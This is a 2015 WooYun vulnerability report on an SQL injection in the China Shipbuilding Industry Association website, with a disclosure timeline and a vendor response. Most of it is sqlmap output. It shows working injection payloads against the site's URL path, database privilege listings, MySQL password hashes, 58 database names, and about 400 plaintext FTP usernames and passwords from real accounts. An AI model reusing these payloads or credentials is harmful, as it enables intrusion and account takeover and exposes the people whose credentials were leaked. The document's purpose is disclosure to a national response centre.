当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136167

漏洞标题:中国船舶工业行业协会伪静态sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: Eric_zZ

提交时间:2015-08-25 15:22

修复时间:2015-10-10 20:06

公开时间:2015-10-10 20:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-26: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

详细说明:

**.**.**.**/index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71


Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND 3632=3632 AND (6265=6265.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: http://**.**.**.**:80/index.php/Information/detail/id/-1506) UNION ALL SELECT NULL,CONCAT(0x7165756b71,0x444e4f43704a46615465,0x71656b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND SLEEP(5) AND (4657=4657.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
---
[22:01:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0.11


OK,注入出来啦,可以爆的都爆一下。

database management system users privileges:                                   
[*] 'camarine'@'localhost' [5]:
privilege: DELETE
privilege: FILE
privilege: INSERT
privilege: SELECT
privilege: UPDATE
[*] 'chinaswsftproot'@'localhost' [1]:
privilege: USAGE
[*] 'cssc2013test'@'localhost' [1]:
privilege: USAGE
[*] 'haiguan'@'%' [5]:
privilege: DELETE
privilege: FILE
privilege: INSERT
privilege: SELECT
privilege: UPDATE
[*] 'jnhr'@'localhost' [4]:
privilege: DELETE
privilege: INSERT
privilege: SELECT
privilege: UPDATE
[*] 'jzshipyard'@'localhost' [1]:
privilege: USAGE
[*] 'ppship'@'localhost' [1]:
privilege: USAGE
[*] 'root'@'**.**.**.**' (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
[*] 'root'@'myweb' (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
[*] 'safe'@'%' [5]:
privilege: DELETE
privilege: FILE
privilege: INSERT
privilege: SELECT
privilege: UPDATE
[*] 'sem'@'localhost' [1]:
privilege: USAGE
[*] 'ship_news'@'localhost' [5]:
privilege: DELETE
privilege: FILE
privilege: INSERT
privilege: SELECT
privilege: UPDATE
[*] 'snm'@'localhost' [1]:
privilege: USAGE
[*] 'webgroups'@'localhost' [1]:
privilege: USAGE


[22:03:38] [INFO] fetching current user
current user: 'root@localhost'
[22:03:38] [INFO] fetching current database
current database: 'hyxh2015'
[22:03:39] [INFO] testing if current user is DBA
[22:03:39] [INFO] fetching current user
current user is DBA: True


database management system users password hashes:
[*] camarine [1]:
password hash: *DC7EFD837AC582C89495EEB9A151551990123587
[*] chinaswsftproot [1]:
password hash: *195C522FD075434029DBE1802248E960D9BAE5D1
[*] cssc2013test [1]:
password hash: *7E2E5DEC0B7F78DF8E7DE58F443946B590C3F8EF
[*] haiguan [1]:
password hash: *1D4C1F5D816E2615855960950EA2E89137CC9122
[*] jnhr [1]:
password hash: *D58A30681E3BD72168A55066128F55C09787F8CB
[*] jzshipyard [1]:
password hash: *98DC96620A8995520AE77F00E09377696460BD55
[*] ppship [1]:
password hash: *371CE96874B45FF9696D6A318410CAD28C2CC6A2
[*] root [2]:
password hash: *83DD22310DC886D501A708D45688B9A3CFAB0138
password hash: *A889171F7E4E2E8329F7AAE374FF2E6ACB5748B7
[*] safe [1]:
password hash: *C9F948E5C5D874A5662335DDBAEA44A60BE2CA50
[*] sem [1]:
password hash: *3CEB3C4C2C6397298255016F6C5131CF25998C00
[*] ship_news [1]:
password hash: *55ECE92BF1801C26152BD69F3473FAB1CA4EE1DF
[*] snm [1]:
password hash: *E6C21ED59FE6A4C4940BDA05B115D3DCD5798CFB
[*] webgroups [1]:
password hash: *191E6263C8FAE53513E8C084453D6029F1890E12


available databases [58]:                                                      
[*] action1
[*] auser_hbeg
[*] bugfree
[*] camarine
[*] cdcol
[*] chinasws2014
[*] chinasws2014_cn
[*] chinaswsftp
[*] csit2014
[*] csit2410_new
[*] cssc2013entest
[*] cssc2013test
[*] cssc_jnzc150
[*] dbtest
[*] ftp
[*] guest_dbs
[*] haiguan
[*] haiguant
[*] hyxh2015
[*] information_nw
[*] information_schema
[*] jnhr
[*] jy
[*] jydiscuz2
[*] material
[*] mysql
[*] phpcms
[*] phpcms_d
[*] phpcms_m
[*] phpcms_n
[*] ppship
[*] safemanage
[*] sem
[*] ship_news
[*] ship_news_1
[*] technology
[*] technologydl
[*] technologydl1
[*] technologydl1_cn
[*] technologydl_cn
[*] test
[*] web_bjhyjs
[*] web_hh
[*] web_hh_en
[*] web_huahai_en
[*] web_old_sh_shipyard
[*] web_waxc
[*] web_wuhu
[*] web_wuhu_en
[*] webgroups_chinasws
[*] webgroups_cstc
[*] webgroups_cstc_e
[*] webgroups_cstc_e_2014test
[*] webgroups_jxjz
[*] webgroups_snm
[*] webgroups_snm_en
[*] wuhu
[*] wuhu_en


此处,58个数据库,这么多敏感信息,而且竟然有个ftp,果断爆它。

Database: ftp
Table: user
[400 entries]
+------------+-------------+
| username | password |
+------------+-------------+
| hhm-dc | dc1465 |
| hhm-plks | plks6514 |
| hhm-yge | yge6354 |
| hhm-cc | cc4596 |
| hhm-shsh | shsh8547 |
| hhm-sl | sl8752 |
| hhm-xm | xm4564 |
| hhm-kw | kw7841 |
| hhm-tx | tx5465 |
| hhm-zc | zc1005 |
| hhm-ryh | ryh6546 |
| hhm-ml | ml0204 |
| hhm-ms | ms5401 |
| hhm-ljdq | ljdq5302 |
| hhm-komet | komet4923 |
| hhm-jd | jd4553 |
| hhm-bs | bs6565 |
| hhm-dljc | dljc5464 |
| hhm-knfs | knfs6346 |
| hhm-cd | cd2584 |
| hhm-sd | sd1285 |
| hhm-zr | zr2125 |
| hhm-lhjh | lhjh0236 |
| hhm-bzjl | bzjl2554 |
| hhm-jlsy | jlsy5266 |
| hhm-qd | qd6952 |
| hhm-db | db3265 |
| hhm-fed | fed1321 |
| hhm-jytw | jytw6521 |
| hhm-lf | lf2106 |
| hhm-qg | qg8752 |
| hhm-xxgm | xxgm0548 |
| hhm-yxtz | yxtz5812 |
| hhm-yl | yl9822 |
| hhm-zlth | zlth8754 |
| hhm-az | az5225 |
| hhm-jel | jel5854 |
| hhm-hst | hst6234 |
| hhm-sljx | sljx5667 |
| hhm-jo | jo2130 |
| hhm-kh | kh6654 |
| hhm-wl | <blank> |
| hhm-yh | yh3216 |
| hhm-zs | zs6545 |
| hhm-zxxs | zxxs9872 |
| hhm-yq | yq5054 |
| hhm-jlzz | jlzz5458 |
| hhm-hf | hf8983 |
| hhm-fr | fr5045 |
| hhm-cj | cj7446 |
| hhm-jw | jw5545 |
| hhm-klk | klk5215 |
| hhm-mg | mg3638 |
| hhm-ntcb | ntcb3511 |
| hhm-nthh | nthh1697 |
| hhm-tlzg | tlzg0687 |
| hhm-rc | rc0688 |
| hhm-sj | sj9663 |
| hhm-shxx | shxx8686 |
| hhm-xyjd | xyjd8696 |
| hhm-cgst | cgst8018 |
| hhm-yhgm | yhgm4923 |
| hhm-clx | clx9815 |
| zhongshe | zhongshe123 |
| hhm-awc | awc5454 |
| hhm-yhcb | yhcb6561 |
| hhm-mts | mts1225 |
| hhm-bx | bx6544 |
| hhm-jysm | jysm8721 |
| hhm-yljs | yljs1221 |
| hhm-zzscl | zzscl4556 |
| hhm-zj | zj2332 |
| hhm-zsdl | zsdl5689 |
| hhm-hgd | hgd3233 |
| hhm-dbrx | dbrx4598 |
| hhm-hkjd | hkjd2121 |
| hhm-mwsb | mwsb5454 |
| hhm-ffdq | ffdq5346 |
| hhm-thgj | thgj6654 |
| hhm-jdgzq | jdgzq2312 |
| hhm-yfjx | yfjx3213 |
| hhm-kymy | kymy6545 |
| hhm-wydq | wydq2165 |
| hhm-cmd | cmd6549 |
| hhm-htpj | htpj5468 |
| hhm-jlc | jlc5217 |
| hhm-shhx | shhx0541 |
| hhm-dy | dy6518 |
| hhm-lcmy | lcmy6563 |
| hhm-rr | rr2136 |
| hhm-tl | tl5245 |
| hhm-cxd | cxd5654 |
| hhm-jshy | jshy5752 |
| hhm-jbby | jbby0246 |
| hhm-jlsj | jlsj2872 |
| hhm-dp | dp0465 |
| hhm-hb | hb5268 |
| hhm-shhz | shhz2188 |
| hhm-shzs | shzs6384 |
| hhm-xad | xad2887 |
| hhm-sdy | sdy2046 |
| hhm-xz | xz4684 |
| hhm-rm | rm6532 |
| hhm-zy | zy9832 |
| hhm-yycb | yycb5478 |
| hhm-bh | bh2154 |
| hhm-hybf | hybf2468 |
| hhm-whxsj | whxsj1122 |
| hhm-zxth | zxth1212 |
| hhm-tydz | tydz3434 |
| hhm-lygl | lygl3344 |
| hhm-jbsy | jbsy5656 |
| hhm-fd | fd5566 |
| hhm-dq | dq6655 |
| hhm-bn | bn6565 |
| hhm-bdzg | bdzg7788 |
| hhm-nhzn | nhzn8787 |
| hhm-yscb | yscb7878 |
| hhm-pldz | pldz8877 |
| hhm-sfwl | sfwl7778 |
| hhm-sda | sda8887 |
| hhm-xelt | xelt8777 |
| hhm-bjzc | bjzc3939 |
| hhm-jsjy | jsjy9393 |
| hhm-dlcy | dlcy2828 |
| hhm-jshd | jshd8282 |
| hhm-shjc | shjc3399 |
| hhm-shmh | shmh9933 |
| hhm-zgsy | zgsy3939 |
| hhm-gzwj | gzwj1201 |
| hhm-ksxf | ksxf1202 |
| hhm-wssy | wssy1203 |
| hhm-cgklp | cgklp1204 |
| hhm-cjsy | cjsy1205 |
| hhm-fgyq | fgyq1206 |
| hhm-hks | hks1207 |
| hhm-nlgm | nlgm1208 |
| hhm-sqdz | sqdz1210 |
| hhm-xcdq | xcdq1211 |
| hhm-zznl | zznl1212 |
| hhm-shsn | shsn1209 |
| hhm-dykj | dykj1213 |
| hhm-megyl | megyl1214 |
| hhm-dycb | dycb1215 |
| hhm-zjcb | zjcb1216 |
| hhm-bskj | bskj1217 |
| hhm-cshz | cshz1218 |
| hhm-jszm | jszm1219 |
| hhm-dhlz | dhlz1220 |
| hhm-dgzd | dgzd1221 |
| hhm-kyjd | kyjd1222 |
| hhm-tyfdj | tyfdj1223 |
| hhm-ydjf | ydjf1224 |
| hhm-hksk | hksk1225 |
| hhm-qsl | qsl1226 |
| hhm-lksl | lksl1227 |
| hhm-taswd | taswd1228 |
| hhm-ctwl | ctwl1229 |
| hhm-cxrj | cxrj1230 |
| hhm-mlzk | mlzk1231 |
| hhm-nok | nok0101 |
| hhm-ksjj | ksjj0102 |
| hhm-dad | dad0103 |
| hhm-mhjd | mhjd0104 |
| hhm-dllt | dllt0105 |
| hhm-tddl | tddl0106 |
| hhm-stbsh | stbsh0107 |
| hhm-ssjd | ssjd0108 |
| hhm-remy | remy0109 |
| hhm-syjc | syjc0110 |
| hhm-wxly | wlxy0111 |
| hhm-glsz | glsz0112 |
| hhm-jwhr | jwhr0113 |
| hhm-hjjx | hjjx0114 |
| hhm-bmrj | bmrj0201 |
| hhm-cbys | cbys0202 |
| hhm-jnyy | jnyy0203 |
| hhm-zymy | zymy0204 |
| hhm-zwl | zwl0205 |
| hhm-stm | stm0206 |
| hhm-jya | jya0207 |
| hhm-hldq | hldq0208 |
| hhm-shhq | shhq123 |
| hhm-SHEPK | shepk123 |
| hhm-SHGZCB | shgzcb123 |
| hhm-CQJZ | cqjz123 |
| hhm-JGS | jgs123 |
| hhm-SHKL | shkl123 |
| hhm-SHSZ | shsz123 |
| hhm-SHSJ | shsj123 |
| hhm-SHGJ | shgj123 |
| hhm-711 | 711123 |
| hhm-czsl | czsl123 |
| hhm-njdn | njdn123 |
| hhm-njhbsr | njhbsr123 |
| hhm-shgst | shgst123 |
| hhm-shsy | shsy123 |
| hhm-jsac | jsac123 |
| hhm-shhf | shhf123 |
| hhm-shsf | shsf123 |
| hhm-shzy | shzy123 |
| hhm-czflt | czflt123 |
| hhm-hfra | hfra123 |
| hhm-njky | njky123 |
| hhm-shdp | shdp123 |
| hhm-shht | shht123 |
| hhm-shkwx | shkwx123 |
| hhm-czck | czck123 |
| hhm-hzhc | hzhc123 |
| hhm-njgc | njgc123 |
| hhm-szxd | szxd123 |
| hhm-wdwd | wdwd12 |
| hhm-sxzs | sxzs123 |
| hhm-shgg | shgg123 |
| hhm-scjs | scjs123 |
| hhm-hydz | hydz123 |
| hhm-htkq | htkq123 |
| hhm-shzb | shzb123 |
| hhm-bsplks | bsplks123 |
| hhm-mggj | mggj123 |
| hhm-rhcb | rhcb123 |
| hhm-xxkz | xxkz |
| hhm-wrt | wrt123 |
| hhm-ef | ef123 |
| hhm-df | df123 |
| hhm-jydl | jydl123 |
| hhm-tn | tn123 |
| hhm-zgshsh | zgshsh123 |
| hhm-fqn | fqn123 |
| hhm-bsxx | bsxx123 |
| hhm-jj | jj123 |
| hhm-sc | sc123 |
| hhm-ty | ty123 |
| hhm-wz | wz123 |
| hhm-hsflks | hsflks123 |
| hhm-lp | lp123 |
| hhm-aszy | aszy123 |
| hhm-ddwy | ddwy123 |
| hhm-dgdl | dgdl123 |
| hhm-xacb | xacb123 |
| hhm-hdk | hdk123 |
| hhm-jezl | jezl123 |
| hhm-nh | nh123 |
| hhm-xzkc | xzkc123 |
| hhm-rp | rp123 |
| hhm-xg | xg123 |
| hhm-znql | znql123 |
| hhm-nek | nek123 |
| hhm-zyth | zyth123 |
| hhm-jne | jne123 |
| hhm-wtq | wtq123 |
| hhm-12s | 12s123 |
| hhm-cz | cz123 |
| hhm-aty | aty123 |
| hhm-hcjd | hcjd123 |
| hhm-scyq | scyq123 |
+------------+-------------+


400个,感觉好腻害的样子。
OK,先这样。

漏洞证明:

同上。

修复方案:

你们专业。

版权声明:转载请注明来源 Eric_zZ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-26 20:05

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT,由其后续协调网站管理单位处置。

最新状态:

暂无